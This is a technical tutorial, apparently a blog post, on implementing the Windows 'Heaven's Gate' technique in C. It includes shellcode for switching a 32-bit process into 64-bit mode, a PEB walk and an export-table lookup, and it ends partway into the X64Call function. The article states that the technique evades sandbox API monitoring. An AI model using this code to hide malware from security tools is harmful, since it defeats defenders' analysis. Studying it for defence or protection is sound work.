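Heaven's Gate: A C Implementation

Heaven's Gate is a technique for executing 64-bit code inside a 32-bit WoW64 process and for calling the 64-bit versions of Windows API functions directly. From a defensive standpoint it can serve as a software protection technique that hinders static analysis and cross-process API hooking; from a malware standpoint it can bypass a sandbox's monitoring of Win32 API calls. This article explains how Heaven's Gate works and walks through an implementation in C.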

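0x00. How It Works

The earliest use of Heaven's Gate can no longer be traced. The earliest detailed write-up I could find is the 2012 article Knockin’ on Heaven’s Gate – Dynamic Processor Mode Switching; it is very thorough, and most later articles on the topic cite it. A more recent one is Rebuild The Heaven’s Gate: from 32-bit Hell back to 64-bit Wonderland, apparently the slides of a talk by a Taiwanese researcher (馬聖豪, author of《惡意程式前線戰術指南》); it is fairly brief.

What is WoW64?

Put simply, WoW64 is a compatibility layer provided by 64-bit Windows. You can think of it as a 32-bit emulated environment created by the 64-bit system so that 32-bit executables run normally on a 64-bit operating system.

For an in-depth treatment I recommend the article WoW64 internals, so I will not go into more detail here.

How a 32-bit process calls an API (WoW64)

The figure below (from Rebuild The Heaven’s Gate: from 32-bit Hell back to 64-bit Wonderland) shows how a 32-bit process normally calls a Win32 API through WoW64, using ZwOpenProcess as the example:

  1. a.exe first calls ZwOpenProcess in the 32-bit ntdll.dll (ntdll32 from here on)
  2. ntdll32 calls X86SwitchTo64BitMode in wow64cpu.dll; as the name suggests, this switches the process from 32-bit mode to 64-bit mode
  3. wow64.dll converts the 32-bit system call into its 64-bit form
  4. ZwOpenProcess in the 64-bit ntdll.dll is called
  5. Execution enters kernel mode (Ring 0) to carry out the system call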

image-20211106105559585

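How a 32-bit process calls an API (Heaven's Gate)

The figure below shows the call path when using Heaven's Gate. Here we bypass the WoW64 layer, switch to 64-bit mode by hand, and call the 64-bit ZwOpenProcess. The rough flow is as follows (it differs slightly from the figure):

  1. Set the cs segment register to 0x33 to switch to 64-bit mode
  2. Read the 64-bit PEB pointer from gs:0x60
  3. Locate the base address of the 64-bit ntdll (ntdll64) through the 64-bit PEB
  4. Walk the ntdll64 export table to find the address of ZwOpenProcess
  5. Set up and perform the 64-bit function call

To call a function outside ntdll, for example CreateFile in kernel32.dll, a few more steps are needed:

  1. Walk the ntdll64 export table to find the address of LdrLoadDll
  2. Call LdrLoadDll("kernel32.dll") to load the 64-bit kernel32.dll
  3. Look up GetProcAddress and similar functions in the 64-bit kernel32, then use them to get the address of CreateFile
  4. Call CreateFile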

image-20211106111544450

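As the steps above show, an API call made through Heaven's Gate never goes through the functions in ntdll32. Most sandboxes today hook only the 32-bit functions when they analyze a 32-bit program, so calls made this way slip past the sandbox's API monitoring: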

image-20211106114019275

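0x01. Implementation

GitHub repository: bluesadi/Heavens-Gate

Implementing Heaven's Gate takes roughly the following functions:

  1. memcpy64: copy data between 64-bit addresses

  2. GetPEB64: get the address of the 64-bit PEB

  3. GetModuleHandle64: get the base address of a 64-bit module

  4. GetProcAddress64: get the address of a function in a 64-bit module

  5. X64Call: call a 64-bit function

  6. MakeUTFStr: build a UNICODE_STRING structure

  7. GetKernel32: load the 64-bit kernel32.dll and its dependency kernelbase.dll

  8. LoadLibrary64: load user32.dll once kernel32.dll has been loaded

The sections below go through each of them in turn.

Environment

  • Visual Studio 2019
  • WinDbg(x64)
  • Windows 10 x64 20H2

In the VS project settings choose "Release" and "Win32", and be sure to turn optimization off (with optimization on, baffling errors appear!):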

image-20211106104714162

Under C/C++ -> Code Generation, set Runtime Library to "Multi-threaded (/MT)", i.e. link the runtime statically:

image-20211106132721846

memcpy64

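Declaration:

void memcpy64(uint64_t dst, uint64_t src, uint64_t sz);

This function copies sz bytes from the 64-bit address src to dst. Because the addresses involved are 64 bits wide, we have to switch to 64-bit mode and do the copy in 64-bit assembly.

The code that switches from 32-bit to 64-bit mode is shown below. [bits 32] means the instructions that follow are assembled in 32-bit mode, and _next_x64_code is the address of the 64-bit code:

[bits 32]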
push 0x33
push _next_x64_code
retf

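retf is a far return: it pops a return address off the top of the stack and then pops a cs segment selector. In the code above, retf jumps to 0x33:_next_x64_code and loads cs with 0x33, at which point the processor is executing in 64-bit mode (on Windows, instructions execute in 32-bit mode when cs is 0x23 and in 64-bit mode when cs is 0x33).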
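To make the two selector values less magical, here is a small sketch that splits an x86 segment selector into its architectural fields (descriptor index, table indicator, requested privilege level). The helper and type names are made up for illustration and are not part of the article's code.

```c
#include <assert.h>
#include <stdint.h>

/* Fields of an x86 segment selector. */
typedef struct {
    uint16_t index; /* descriptor table index (bits 15..3) */
    uint8_t  ti;    /* table indicator: 0 = GDT, 1 = LDT (bit 2) */
    uint8_t  rpl;   /* requested privilege level (bits 1..0) */
} selector_fields;

/* Hypothetical helper: split a selector into its three fields. */
static selector_fields decode_selector(uint16_t sel) {
    selector_fields f;
    f.index = (uint16_t)(sel >> 3);
    f.ti    = (uint8_t)((sel >> 2) & 1);
    f.rpl   = (uint8_t)(sel & 3);
    return f;
}
```

Decoded this way, 0x23 and 0x33 are GDT entries 4 and 6, both with RPL 3 (user mode); the two selectors differ only in which code-segment descriptor they pick.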

Next come the 64-bit instructions that copy the data from src to dst; they need no further explanation:

[bits 64]
push rsi
push rdi
mov rsi, src
mov rdi, dst
mov rcx, sz
rep movsb
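pop rdi
pop rsi

Once the 64-bit code has run, we switch back to 32-bit mode and return. The q in retfq stands for qword: the instruction pops a 64-bit return address, followed by the cs selector from another 64-bit stack slot:

[bits 64]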
push 0x23
push _next_x86_code
retfq
[bits 32]
ret

The assembly can be assembled with Python's keystone module:

from keystone import *

code = '''
push 0x33
push 0x12345678
retf
'''

# Assemble as 32-bit x86; ks.asm returns (list of byte values, statement count)
ks = Ks(KS_ARCH_X86, KS_MODE_32)
asm, cnt = ks.asm(code)
print(code)
for b in asm:
    print('0x' + hex(b)[2:].upper(), end=', ')

The output is the shellcode. The 0x12345678 placeholder has to be replaced with _next_x64_code, the address of the 64-bit instructions that follow:

push 0x33
push 0x12345678
retf

0x6A, 0x33, 0x68, 0x78, 0x56, 0x34, 0x12, 0xCB,

The complete shellcode:

static uint8_t code[] = {
    /*  [bits 32]
        push 0x33
        push _next_x64_code
        retf
    */
    0x6A, 0x33, 0x68, 0x78, 0x56, 0x34, 0x12, 0xCB,
    /*  [bits 64]
        push rsi
        push rdi
        mov rsi, src
        mov rdi, dst
        mov rcx, sz
        rep movsb
        pop rdi     ; popped in the reverse order of the pushes
        pop rsi
    */
    0x56, 0x57,
    0x48, 0xBE, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11,
    0x48, 0xBF, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11,
    0x48, 0xB9, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11,
    0xF3, 0xA4,
    0x5F, 0x5E,
    /*  [bits 64]
        push 0x23
        push _next_x86_code
        retfq
    */
    0x6A, 0x23, 0x68, 0x78, 0x56, 0x34, 0x12, 0x48, 0xCB,
    /*  [bits 32]
        ret
    */
    0xC3
};

To run this shellcode we allocate a fresh region of memory with VirtualAlloc and PAGE_EXECUTE_READWRITE protection (readable, writable and executable), copy the shellcode into it, patch in the values of _next_x64_code, src, dst, sz and _next_x86_code, and then execute it:

static uint32_t ptr = 0;
if (!ptr) {
    // Allocate the executable buffer once and copy the template into it
    ptr = (uint32_t)VirtualAlloc(NULL, sizeof(code), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    for (int i = 0; i < sizeof(code); i++) ((PBYTE)ptr)[i] = code[i];
}
*(uint32_t*)(ptr + 3) = ptr + 8;    // _next_x64_code
*(uint64_t*)(ptr + 12) = src;
*(uint64_t*)(ptr + 22) = dst;
*(uint64_t*)(ptr + 32) = sz;
*(uint32_t*)(ptr + 47) = ptr + 53;  // _next_x86_code
((void(*)())ptr)();
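The hard-coded patch offsets (3, 12, 22, 32, 47) are easy to get wrong when the stub changes. As a sanity check, the sketch below scans a copy of the stub's byte layout for the placeholder immediates and reports where they sit. It is plain portable C that never executes the bytes; the helper names are made up for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Byte layout of the memcpy64 stub, with placeholder immediates. */
static const uint8_t memcpy64_stub[] = {
    0x6A, 0x33, 0x68, 0x78, 0x56, 0x34, 0x12, 0xCB,             /* push 0x33; push imm32; retf */
    0x56, 0x57,                                                 /* push rsi; push rdi */
    0x48, 0xBE, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11, /* mov rsi, imm64 */
    0x48, 0xBF, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11, /* mov rdi, imm64 */
    0x48, 0xB9, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11, /* mov rcx, imm64 */
    0xF3, 0xA4,                                                 /* rep movsb */
    0x5F, 0x5E,                                                 /* pop rdi; pop rsi */
    0x6A, 0x23, 0x68, 0x78, 0x56, 0x34, 0x12, 0x48, 0xCB,       /* push 0x23; push imm32; retfq */
    0xC3                                                        /* ret */
};

/* Offset of the first occurrence of pat at or after from, or -1 if absent. */
static long find_bytes(const uint8_t *buf, size_t len,
                       const uint8_t *pat, size_t pat_len, size_t from) {
    for (size_t i = from; i + pat_len <= len; i++)
        if (memcmp(buf + i, pat, pat_len) == 0) return (long)i;
    return -1;
}

/* Locate the 32-bit placeholder 0x12345678 (stored little-endian). */
static long find_imm32(const uint8_t *buf, size_t len, size_t from) {
    static const uint8_t pat[4] = { 0x78, 0x56, 0x34, 0x12 };
    return find_bytes(buf, len, pat, sizeof pat, from);
}

/* Locate the 64-bit placeholder 0x1122334455667788 (stored little-endian). */
static long find_imm64(const uint8_t *buf, size_t len, size_t from) {
    static const uint8_t pat[8] = { 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11 };
    return find_bytes(buf, len, pat, sizeof pat, from);
}
```

Scanning from offset 0 finds the first 32-bit placeholder at 3 and the first 64-bit one at 12; continuing the scan just past each hit yields 22, 32 and 47, which matches the patch code. The stub is 54 bytes long, so the final ret sits at offset 53.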

The complete code:

void memcpy64(uint64_t dst, uint64_t src, uint64_t sz) {
    static uint8_t code[] = {
        /*  [bits 32]
            push 0x33
            push _next_x64_code
            retf
        */
        0x6A, 0x33, 0x68, 0x78, 0x56, 0x34, 0x12, 0xCB,
        /*  [bits 64]
            push rsi
            push rdi
            mov rsi, src
            mov rdi, dst
            mov rcx, sz
            rep movsb
            pop rdi     ; popped in the reverse order of the pushes
            pop rsi
        */
        0x56, 0x57,
        0x48, 0xBE, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11,
        0x48, 0xBF, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11,
        0x48, 0xB9, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11,
        0xF3, 0xA4,
        0x5F, 0x5E,
        /*  [bits 64]
            push 0x23
            push _next_x86_code
            retfq
        */
        0x6A, 0x23, 0x68, 0x78, 0x56, 0x34, 0x12, 0x48, 0xCB,
        /*  [bits 32]
            ret
        */
        0xC3
    };

    static uint32_t ptr = 0;
    if (!ptr) {
        // Allocate the executable buffer once and copy the template into it
        ptr = (uint32_t)VirtualAlloc(NULL, sizeof(code), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        for (int i = 0; i < sizeof(code); i++) ((PBYTE)ptr)[i] = code[i];
    }
    *(uint32_t*)(ptr + 3) = ptr + 8;    // _next_x64_code
    *(uint64_t*)(ptr + 12) = src;
    *(uint64_t*)(ptr + 22) = dst;
    *(uint64_t*)(ptr + 32) = sz;
    *(uint32_t*)(ptr + 47) = ptr + 53;  // _next_x86_code
    ((void(*)())ptr)();
}

GetPEB64

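Declaration:

void GetPEB64(void* peb64);

This function retrieves the address of the 64-bit PEB (PEB64).

In 64-bit mode gs:[0x30] holds the address of the TEB and gs:[0x60] holds the address of the PEB, so getting the PEB64 address is simple: load gs:[0x60] into rax and store it into the buffer that esi points to (the caller's peb64 argument):

[bits 64]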
mov rax, gs:[0x60]
mov [esi], rax

The complete code:

void GetPEB64(void *peb64) {
    static uint8_t code[] = {
        /*  [bits 32]
            push esi            ; esi is callee-saved in 32-bit code, so preserve it
            mov esi, peb64
            push 0x33
            push _next_x64_code
            retf
        */
        0x56, 0xBE, 0x78, 0x56, 0x34, 0x12, 0x6A, 0x33, 0x68, 0x78, 0x56, 0x34, 0x12, 0xCB,
        /*  [bits 64]
            mov rax, gs:[0x60]
            mov [esi], rax
        */
        0x65, 0x48, 0xA1, 0x60, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x67, 0x48, 0x89, 0x6,
        /*  [bits 64]
            push 0x23
            push _next_x86_code
            retfq
        */
        0x6A, 0x23, 0x68, 0x78, 0x56, 0x34, 0x12, 0x48, 0xCB,
        /*  [bits 32]
            pop esi
            ret
        */
        0x5E, 0xC3
    };

    static uint32_t ptr = 0;
    if (!ptr) {
        ptr = (uint32_t)VirtualAlloc(NULL, sizeof(code), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        for (int i = 0; i < sizeof(code); i++) ((PBYTE)ptr)[i] = code[i];
    }
    *(uint32_t*)(ptr + 2) = (uint32_t)peb64;  // output buffer
    *(uint32_t*)(ptr + 9) = ptr + 14;         // _next_x64_code
    *(uint32_t*)(ptr + 32) = ptr + 38;        // _next_x86_code
    ((void(*)())ptr)();
}

GetModuleHandle64

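Declaration:

uint64_t GetModuleHandle64(const WCHAR *moduleName);

This function returns the base address of the module named moduleName.

The steps are:

  1. Read the address of Ldr at PEB+0x18
  2. Take the address of InLoadOrderModuleList at Ldr+0x10
  3. Walk InLoadOrderModuleList, reading each entry's module name
  4. Compare the name with moduleName and, on a match, return that entry's module base address

Using the dt command in WinDbg to dump the structure, we can see that Ldr is at offset 0x018 in the PEB:

0:000> dt _PEB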
ntdll!_PEB
+0x000 InheritedAddressSpace : UChar
+0x001 ReadImageFileExecOptions : UChar
+0x002 BeingDebugged : UChar
+0x003 BitField : UChar
+0x003 ImageUsesLargePages : Pos 0, 1 Bit
+0x003 IsProtectedProcess : Pos 1, 1 Bit
+0x003 IsImageDynamicallyRelocated : Pos 2, 1 Bit
+0x003 SkipPatchingUser32Forwarders : Pos 3, 1 Bit
+0x003 IsPackagedProcess : Pos 4, 1 Bit
+0x003 IsAppContainer : Pos 5, 1 Bit
+0x003 IsProtectedProcessLight : Pos 6, 1 Bit
+0x003 IsLongPathAwareProcess : Pos 7, 1 Bit
+0x004 Padding0 : [4] UChar
+0x008 Mutant : Ptr64 Void
+0x010 ImageBaseAddress : Ptr64 Void
+0x018 Ldr : Ptr64 _PEB_LDR_DATA

Use the memcpy64 function implemented earlier to copy the address of Ldr:

uint64_t peb64;
uint64_t ldrData;

GetPEB64(&peb64);
memcpy64((uint64_t)&ldrData, peb64 + 0x18, 8);

Dumping the _PEB_LDR_DATA structure shows that InLoadOrderModuleList is at offset 0x10 in Ldr:

0:000> dt _PEB_LDR_DATA
ntdll!_PEB_LDR_DATA
+0x000 Length : Uint4B
+0x004 Initialized : UChar
+0x008 SsHandle : Ptr64 Void
+0x010 InLoadOrderModuleList : _LIST_ENTRY
+0x020 InMemoryOrderModuleList : _LIST_ENTRY
+0x030 InInitializationOrderModuleList : _LIST_ENTRY
+0x040 EntryInProgress : Ptr64 Void
+0x048 ShutdownInProgress : UChar
+0x050 ShutdownThreadId : Ptr64 Void

Read the first entry of InLoadOrderModuleList:

uint64_t head;
uint64_t pNode;

head = ldrData + 0x10;
memcpy64((uint64_t)&pNode, head, 8);

Each node on InLoadOrderModuleList is actually a _LDR_DATA_TABLE_ENTRY. Its BaseDllName field holds the DLL's name and has type _UNICODE_STRING:

0:000> dt _LDR_DATA_TABLE_ENTRY
ntdll!_LDR_DATA_TABLE_ENTRY
+0x000 InLoadOrderLinks : _LIST_ENTRY
+0x010 InMemoryOrderLinks : _LIST_ENTRY
+0x020 InInitializationOrderLinks : _LIST_ENTRY
+0x030 DllBase : Ptr64 Void
+0x038 EntryPoint : Ptr64 Void
+0x040 SizeOfImage : Uint4B
+0x048 FullDllName : _UNICODE_STRING
+0x058 BaseDllName : _UNICODE_STRING

0:000> dt _UNICODE_STRING
ntdll!_UNICODE_STRING
+0x000 Length : Uint2B
+0x002 MaximumLength : Uint2B
+0x008 Buffer : Ptr64 Wchar

So the offset of Buffer within _LDR_DATA_TABLE_ENTRY is 0x58 + 0x08 = 0x60, i.e. 96.
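Rather than adding offsets by hand, the same numbers can be derived with offsetof from a mirror of the 64-bit layout. The sketch below declares only the leading fields shown in the WinDbg dumps, using fixed-width integers and explicit padding so that the layout does not depend on the compiler's target; the type and constant names are made up for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* 64-bit _LIST_ENTRY: two 8-byte pointers. */
typedef struct { uint64_t Flink, Blink; } list_entry64;

/* 64-bit _UNICODE_STRING. */
typedef struct {
    uint16_t Length;
    uint16_t MaximumLength;
    uint32_t Padding;   /* explicit padding so Buffer sits at +0x08 */
    uint64_t Buffer;
} unicode_string64;

/* Leading fields of the 64-bit _LDR_DATA_TABLE_ENTRY. */
typedef struct {
    list_entry64     InLoadOrderLinks;            /* +0x00 */
    list_entry64     InMemoryOrderLinks;          /* +0x10 */
    list_entry64     InInitializationOrderLinks;  /* +0x20 */
    uint64_t         DllBase;                     /* +0x30 */
    uint64_t         EntryPoint;                  /* +0x38 */
    uint32_t         SizeOfImage;                 /* +0x40 */
    uint32_t         Padding;                     /* explicit padding up to +0x48 */
    unicode_string64 FullDllName;                 /* +0x48 */
    unicode_string64 BaseDllName;                 /* +0x58 */
} ldr_entry64_prefix;

enum {
    OFF_DLL_BASE         = offsetof(ldr_entry64_prefix, DllBase),
    OFF_BASE_NAME_BUFFER = offsetof(ldr_entry64_prefix, BaseDllName)
                         + offsetof(unicode_string64, Buffer)
};
```

OFF_BASE_NAME_BUFFER evaluates to 96 and OFF_DLL_BASE to 48, the two constants that the list traversal uses.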

The code that walks the list:

while (pNode != head) {
    uint64_t buffer;
    memcpy64((uint64_t)(unsigned)(&buffer), pNode + 96, 8); // buffer = pNode->BaseDllName.Buffer
    if (buffer) {
        WCHAR curModuleName[32] = {0};
        memcpy64((uint64_t)curModuleName, buffer, 60); // copy 30 WCHARs, leaving a terminating 0
        if (!lstrcmpiW(moduleName, curModuleName)) {
            uint64_t base;
            memcpy64((uint64_t)&base, pNode + 48, 8); // base = pNode->DllBase
            return base;
        }
    }
    memcpy64((uint64_t)&pNode, pNode, 8); // pNode = pNode->Flink
}
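The loop relies on the list being circular: the head is a sentinel embedded in Ldr, and the walk stops when Flink leads back to it. The same pattern can be tried on ordinary in-process structures. The sketch below is a simplified stand-in (narrow-character names, native pointers, made-up module names and base addresses), not the loader's real data.

```c
#include <assert.h>
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>

typedef struct list_node { struct list_node *flink, *blink; } list_node;

typedef struct {
    list_node   links;  /* first member, so a list_node* is also a module_entry* */
    const char *name;
    uint64_t    base;
} module_entry;

/* ASCII case-insensitive string equality. */
static int equal_ignore_case(const char *a, const char *b) {
    while (*a && *b) {
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b)) return 0;
        a++; b++;
    }
    return *a == *b;
}

/* Insert node at the tail of the circular list anchored at head. */
static void list_append(list_node *head, list_node *node) {
    node->flink = head;
    node->blink = head->blink;
    head->blink->flink = node;
    head->blink = node;
}

/* Walk from head->flink until we are back at the sentinel. */
static uint64_t find_module(const list_node *head, const char *name) {
    for (const list_node *n = head->flink; n != head; n = n->flink) {
        const module_entry *m = (const module_entry *)n;
        if (equal_ignore_case(m->name, name)) return m->base;
    }
    return 0;
}

/* Demo with two made-up modules. */
static uint64_t demo_lookup(const char *name) {
    list_node head = { &head, &head };  /* empty list: head points at itself */
    module_entry a = { { 0, 0 }, "app.exe",   0x400000 };
    module_entry b = { { 0, 0 }, "ntdll.dll", 0x7FFA12340000ull };
    list_append(&head, &a.links);
    list_append(&head, &b.links);
    return find_module(&head, name);
}
```

In this demo, looking up "NTDLL.DLL" returns the made-up base of the second entry, and a name that is not on the list returns 0 once the walk reaches the sentinel again.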

The complete code:

uint64_t GetModuleHandle64(const WCHAR *moduleName) {
    uint64_t peb64;
    /*  nt!_PEB_LDR_DATA
        +0x000 Length : Uint4B
        +0x004 Initialized : UChar
        +0x008 SsHandle : Ptr64 Void
        +0x010 InLoadOrderModuleList : _LIST_ENTRY
    */
    uint64_t ldrData;
    /*
        ptr to InLoadOrderModuleList
    */
    uint64_t head;
    /*
        typedef struct _LDR_MODULE {
        +0x000 LIST_ENTRY InLoadOrderModuleList;
        +0x010 LIST_ENTRY InMemoryOrderModuleList;
        +0x020 LIST_ENTRY InInitializationOrderModuleList;
        +0x030 PVOID BaseAddress;
        +0x038 PVOID EntryPoint;
        +0x040 ULONG SizeOfImage;
        +0x048 UNICODE_STRING FullDllName;
        +0x058 UNICODE_STRING BaseDllName;
        ...
        } LDR_MODULE, *PLDR_MODULE;
    */
    uint64_t pNode;
    GetPEB64(&peb64);
    memcpy64((uint64_t)&ldrData, peb64 + 0x18, 8);  // ldrData = peb64->Ldr
    head = ldrData + 0x10;
    memcpy64((uint64_t)&pNode, head, 8);            // pNode = head->Flink
    while (pNode != head) {
        uint64_t buffer;
        memcpy64((uint64_t)(unsigned)(&buffer), pNode + 96, 8); // buffer = pNode->BaseDllName.Buffer
        if (buffer) {
            WCHAR curModuleName[32] = {0};
            memcpy64((uint64_t)curModuleName, buffer, 60); // copy 30 WCHARs, leaving a terminating 0
            if (!lstrcmpiW(moduleName, curModuleName)) {
                uint64_t base;
                memcpy64((uint64_t)&base, pNode + 48, 8); // base = pNode->DllBase
                return base;
            }
        }
        memcpy64((uint64_t)&pNode, pNode, 8); // pNode = pNode->Flink
    }
    return 0;
}

MyGetProcAddress

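Declaration:

uint64_t MyGetProcAddress(uint64_t hModule, const char* func);

After GetModuleHandle64 has given us a module's base address, we still cannot use GetProcAddress from kernel32.dll to look up functions in it, because the 64-bit kernel32.dll has not been loaded yet. As a stopgap, we find function addresses by walking the module's export table.

First get the address of the export table. This part relies on the PE file format, which I will not cover here:

IMAGE_DOS_HEADER dos;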
memcpy64((uint64_t)&dos, hModule, sizeof(dos));
IMAGE_NT_HEADERS64 nt;
memcpy64((uint64_t)&nt, hModule + dos.e_lfanew, sizeof(nt));
IMAGE_EXPORT_DIRECTORY expo;
memcpy64((uint64_t)&expo, hModule + nt.OptionalHeader.DataDirectory[0].VirtualAddress, sizeof(expo));

Then walk the export table, reading each function's name and address. The name is compared with func, and on a match the function's address is returned:

for (uint64_t i = 0; i < expo.NumberOfNames; i++) {
    DWORD pName;
    memcpy64((uint64_t)&pName, hModule + expo.AddressOfNames + (4 * i), 4);
    char name[65] = {0}; // one spare byte keeps the copy NUL-terminated
    memcpy64((uint64_t)name, hModule + pName, 64);
    if (!lstrcmpA(name, func)) {
        // The name index maps to an ordinal, which in turn indexes the function table
        WORD ord;
        memcpy64((uint64_t)&ord, hModule + expo.AddressOfNameOrdinals + (2 * i), 2);
        uint32_t addr;
        memcpy64((uint64_t)&addr, hModule + expo.AddressOfFunctions + (4 * ord), 4);
        return hModule + addr;
    }
}
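The two-step indirection (name index to ordinal, ordinal to function RVA) is the part that is easiest to get wrong, so here is a sketch that runs the same lookup against a tiny synthetic image held in a byte buffer. The table positions, export names and RVAs are all made up for the demo; only the lookup logic mirrors the loop above.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Unaligned reads and writes relative to the image base. */
static uint32_t rd32(const uint8_t *img, uint32_t rva) { uint32_t v; memcpy(&v, img + rva, 4); return v; }
static uint16_t rd16(const uint8_t *img, uint32_t rva) { uint16_t v; memcpy(&v, img + rva, 2); return v; }
static void wr32(uint8_t *img, uint32_t rva, uint32_t v) { memcpy(img + rva, &v, 4); }
static void wr16(uint8_t *img, uint32_t rva, uint16_t v) { memcpy(img + rva, &v, 2); }

/* The four export-directory fields the lookup needs (all RVAs). */
typedef struct { uint32_t count, names, ordinals, functions; } export_tables;

/* Return the RVA of the export called name, or 0 if it is not exported. */
static uint32_t find_export(const uint8_t *img, const export_tables *t, const char *name) {
    for (uint32_t i = 0; i < t->count; i++) {
        uint32_t name_rva = rd32(img, t->names + 4 * i);
        if (strcmp((const char *)img + name_rva, name) == 0) {
            uint16_t ord = rd16(img, t->ordinals + 2 * i);  /* name index -> ordinal */
            return rd32(img, t->functions + 4 * ord);       /* ordinal -> function RVA */
        }
    }
    return 0;
}

/* Build a made-up 256-byte image with two exports whose ordinals are swapped. */
static export_tables build_demo_image(uint8_t img[256]) {
    export_tables t = { 2, 0x10, 0x20, 0x30 };
    memset(img, 0, 256);
    strcpy((char *)img + 0x80, "Alpha");
    strcpy((char *)img + 0x90, "Beta");
    wr32(img, t.names + 0, 0x80);
    wr32(img, t.names + 4, 0x90);
    wr16(img, t.ordinals + 0, 1);        /* "Alpha" -> function slot 1 */
    wr16(img, t.ordinals + 2, 0);        /* "Beta"  -> function slot 0 */
    wr32(img, t.functions + 0, 0x2000);
    wr32(img, t.functions + 4, 0x1000);
    return t;
}

/* Demo: look a name up in the synthetic image. */
static uint32_t demo_export_rva(const char *name) {
    uint8_t img[256];
    export_tables t = build_demo_image(img);
    return find_export(img, &t, name);
}
```

Because the ordinals are deliberately swapped, indexing the function table with the name index instead of the ordinal would return the wrong RVA, which is exactly the mistake the extra table exists to prevent.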

The complete code:

uint64_t MyGetProcAddress(uint64_t hModule, const char* func) {
    // Locate the export directory through the DOS and NT headers
    IMAGE_DOS_HEADER dos;
    memcpy64((uint64_t)&dos, hModule, sizeof(dos));
    IMAGE_NT_HEADERS64 nt;
    memcpy64((uint64_t)&nt, hModule + dos.e_lfanew, sizeof(nt));
    IMAGE_EXPORT_DIRECTORY expo;
    memcpy64((uint64_t)&expo, hModule + nt.OptionalHeader.DataDirectory[0].VirtualAddress, sizeof(expo));

    for (uint64_t i = 0; i < expo.NumberOfNames; i++) {
        DWORD pName;
        memcpy64((uint64_t)&pName, hModule + expo.AddressOfNames + (4 * i), 4);
        char name[65] = {0}; // one spare byte keeps the copy NUL-terminated
        memcpy64((uint64_t)name, hModule + pName, 64);
        if (!lstrcmpA(name, func)) {
            // The name index maps to an ordinal, which in turn indexes the function table
            WORD ord;
            memcpy64((uint64_t)&ord, hModule + expo.AddressOfNameOrdinals + (2 * i), 2);
            uint32_t addr;
            memcpy64((uint64_t)&addr, hModule + expo.AddressOfFunctions + (4 * ord), 4);
            return hModule + addr;
        }
    }
    return 0;
}

X64Call

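Declaration:

uint64_t X64Call(uint64_t proc, uint32_t argc, ...);

32-bit and 64-bit code pass arguments differently, and the address returned by MyGetProcAddress in the previous step is a 64-bit one, so it cannot simply be cast to a function pointer and called. Instead we use 64-bit assembly to perform the call.

First, a quick look at how arguments are passed to WINAPI functions in 64-bit code:

  • The first four arguments go, left to right, into the rcx, rdx, r8 and r9 registers
  • The remaining arguments are pushed onto the stack from right to left
  • 32 bytes (0x20) of space must be reserved between rsp and the arguments on the stack; the callee may use it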

image-20211106141230284
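The rules above reduce to a little arithmetic. The sketch below computes, for a given argument count, how many arguments end up on the stack, how many bytes the caller places there (reserved space plus stack arguments), and how much padding would be needed to keep the total a multiple of 16, which is the alignment the Windows x64 convention expects at a call. The function names are made up, and the padding figure assumes rsp was 16-byte aligned before anything was pushed.

```c
#include <assert.h>
#include <stdint.h>

enum { X64_REG_ARGS = 4, X64_SHADOW_BYTES = 32 };

/* Number of arguments that do not fit in rcx, rdx, r8, r9. */
static uint32_t x64_stack_arg_count(uint32_t argc) {
    return argc > X64_REG_ARGS ? argc - X64_REG_ARGS : 0;
}

/* Bytes the caller places on the stack: reserved space plus 8 per stack argument. */
static uint32_t x64_frame_bytes(uint32_t argc) {
    return X64_SHADOW_BYTES + 8 * x64_stack_arg_count(argc);
}

/* Extra bytes needed so the frame is a multiple of 16
   (assumes rsp was 16-byte aligned before the frame was built). */
static uint32_t x64_frame_padding(uint32_t argc) {
    return (16 - x64_frame_bytes(argc) % 16) % 16;
}
```

For a four-argument call such as MessageBoxA the frame is just the 32 reserved bytes. A seven-argument call such as CreateFileA needs 32 + 3 * 8 = 56 bytes, plus 8 bytes of padding if 16-byte alignment is to be preserved.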

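Now build the shellcode. Because we are about to manipulate the stack pointer, esp is first saved in ebx and restored after the shellcode has run. and esp, 0xFFFFFFF8 aligns the stack pointer to 8 bytes, the minimum needed for 64-bit pushes and pops. Note that the Windows x64 calling convention actually expects rsp to be 16-byte aligned at the point of a call, which this stub does not guarantee; a misaligned stack can make some API calls fail:

[bits 32]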
push ebx
mov ebx, esp
and esp, 0xFFFFFFF8

push 0x33
push _next_x64_code
retf

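After switching to 64-bit mode, the arguments are passed according to the 64-bit WINAPI calling convention, 32 bytes are reserved before the call, and the return value in rax is stored into ret. rsi and rdi are pushed at the start and popped at the end. Be aware that rsp is not moved back after the call, so those two pops read from the reserved 32 bytes rather than the saved values; esp is still recovered from ebx afterwards, but esi and edi are not reliably restored:

[bits 64]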
push rsi
push rdi

mov rsi, args
mov rcx, [rsi]
mov rdx, [rsi+8]
mov r8, [rsi+16]
mov r9, [rsi+24]

mov rax, argc
args_start:
cmp rax, 4
jle args_end
mov rdi, [rsi+8*rax-8]
push rdi
dec rax
jmp args_start
args_end:

mov rax, proc
sub rsp, 32
call rax

mov rdi, &ret
mov [rdi], rax

pop rdi
pop rsi

Finally, switch back to 32-bit mode and restore esp and ebx:

[bits 64]
push 0x23
push _next_x86_code
retfq
[bits 32]
mov esp, ebx
pop ebx
ret

The complete code:

uint64_t X64Call(uint64_t proc, uint32_t argc, ...) {
    // The variadic arguments follow argc on the 32-bit stack, each passed as a uint64_t
